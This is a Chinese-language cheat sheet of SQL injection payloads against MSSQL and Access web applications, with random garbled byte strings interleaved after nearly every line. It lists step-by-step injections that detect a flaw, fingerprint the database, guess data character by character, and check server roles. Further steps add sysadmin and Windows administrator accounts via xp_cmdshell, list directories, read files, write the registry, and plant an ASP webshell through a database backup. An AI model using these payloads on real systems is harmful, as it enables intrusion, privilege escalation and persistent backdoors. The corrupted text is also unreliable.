1.判断是否有注入;and 1=1 ;and 1=2 Ja1[vO"YgP
2.初步判断是否是mssql ;and user>0 >f)/z$
qn�
�fKE��Zlrw
3.注入参数是字符'and [查询条件] and ''=' /$�a>f>EJ�
�9vIqG�z-o
4.搜索时没过滤参数的'and [查询条件] and '%25'=' WRa1�VU�&f
Fu�0"Asxce
5.判断数据库系统 NQB���a+N
W)�F<�<B,
;and (select count(*) from sysobjects)>0 mssql JF{yhx,+�p
a�bog�\��0
;and (select count(*) from msysobjects)>0 access %#5\^4$z|N
X�}�"Ic@8�
D*7���JE��
�/mS��|Byx
6.猜数据库 ;and (select Count(*) from [数据库名])>0 t�Y�b�8a�
>�4I,9TO��
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 z}Y23W&sX�
3B�*�b ��d
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 5Bwr�\]%$P
/�~�s�Nx��
9.(1)猜字段的ascii值(access) A'�A5.�\UN
&�lbZTY��}
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ^eF%4D�UC;
�b��Uv}(�{
(2)猜字段的ascii值(mssql) O5r�HN;\_
pF0s�XvWGG
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ��Q=�B��>Q
8+}�y��f.`
10.测试权限结构(mssql) �RbOEXH*]�
<��4��l��R
B=�<>OY��H
9, �A(��|g
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- ���!4;A"B(
+M� �)ep\j
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- (L`7-6e(Ab
Kjw=�=5)}
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- M�yj��5qh
�ENx�1)�]�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- C8^h`B9z&I
`.oWmBey\�
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- L@m��NfLK�
o )\\�(^ld
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- �h=?V)WS�M
P��hUG�}94
;and 1=(select IS_MEMBER('db_owner'));-- 7hV9n�u��W
=2Vs�))�>Y
�]�|�H`?L�
K�)ZW1d�;�
11.添加mssql和系统的帐户 �hk5[ N=��
pJg'�$iR!/
;exec master.dbo.sp_addlogin username;-- xi+bBqg<.K
;exec master.dbo.sp_password null,username,password;-- �;)n��kY6-
X�667�*L^�
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- b�Q��%6z}r
ig-V�^���P
;exec master.dbo.xp_cmdshell 'net user username password T�[?�wbYfW
Uz��4���!O
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- ~wejy3|@�0
3/�?^�d;�=
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ?"hrCEHV{9
�q�G��lbO�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- d�+ca�GpaR
kdgU1T�@y.
0f_+h %%�=
5��{z�muv:
12.(1)遍历目录 \C{D�ui)�F
,�0hk)Vvr3
;create table dirs(paths varchar(100), id int) _DDk�nQP��
�xX !`0T7Y
;insert dirs exec master.dbo.xp_dirtree 'c:\' z_i��(�o
�|\}&��mBR
;and (select top 1 paths from dirs)>0 w�"�Pn��N
h+\+9�^l6|
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) ~nP~6Q'wSH
Jn�|sS(�Q}
�l+� ,p�=�
Ux/|�D_rlf
(2)遍历目录 z`Jc���pt�
eq"
eLk6�h
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- m�M[KT}
A
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 .8���GX8[t
*\-$.w)��k
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 CI�#6�r�8u
B|�f
=h�lY
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 mBwM=L�A�Z
_YK66cS3E/
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �w$)NW57[|
C��{*' p+f
U}�yq*$N��
�e7�_.Xr~[
13.mssql中的存储过程 @�s�r~&YhA
^@V;�`jsll
xp_regenumvalues 注册表根键, 子键 o�^�e�fe�I
gTM*t�d(~^
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 $q|-���9�B
yv;KK�Q� �
xp_regread 根键,子键,键值名 m�hN�X05D�
=K����\xE"
;exec xp_regread Yy 8?�X9r.
7Mj:�bm�&9
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 o){\�q�hLp
xC�QLfXK�7
xp_regwrite 根键,子键, 值名, 值类型, 值 {`ghX%�M(l
YAd�k3y~pL
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 CyV2=o!F w
�&��F�poMW
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ��/K�d9UQU
?~:4�O}5Ax
xp_regdeletevalue 根键,子键,值名 uGc0Lv4�i/
;�],Js1��m
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 k�e)}J�U^"
@zC�p/fo3
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 d�:vuR�K4+
�S��{Q2�KD
7W�MF8�(j5
Oxp�!G7qfo
14.mssql的backup创建webshell 8}?�w�i[�T
2JhE`E�VH�
use model X�
�T<SR]
"!B\�c9�q�
create table cmd(str image); 1Rg�ER���j
jh���J'fI�
insert into cmd(str) values (''); FX
�
%(<M
�!jTxMf�
backup database model to disk='c:\l.asp'; h}U>K4BJ��
W�t M1nnJp
h�h[�@q�*C
@�kPe/j/[1
15.mssql内置函数 �fq�[1�|Q�
.
#FJM2�Xk
;and (select @@version)>0 获得Windows的版本号
Y2TXWl,Jk
H[Q3M�~_E�
;and user_name()='dbo' 判断当前系统的连接用户是不是sa /�8?� u2
q
���h
J �H
;and (select user_name())>0 爆当前系统的连接用户 LTTMxiq[*�
iBt<EM�]U/
;and (select db_name())>0 得到当前连接的数据库 \�v�_R]0m\
���V�e�ipM
R�xA:>yOPn
m�##_U��9O
16.简洁的webshell _B?Hw[cc
�VZ���]}9k
use model tc�|PN+v�;
���4J{W8jX
create table cmd(str image); `uo�f\D<']
^4~?]5�Y\
insert into cmd(str) values (''); ET[>�kn^#
�3De(:c)@
backup database model to disk='g:\wwwtest\l.asp';
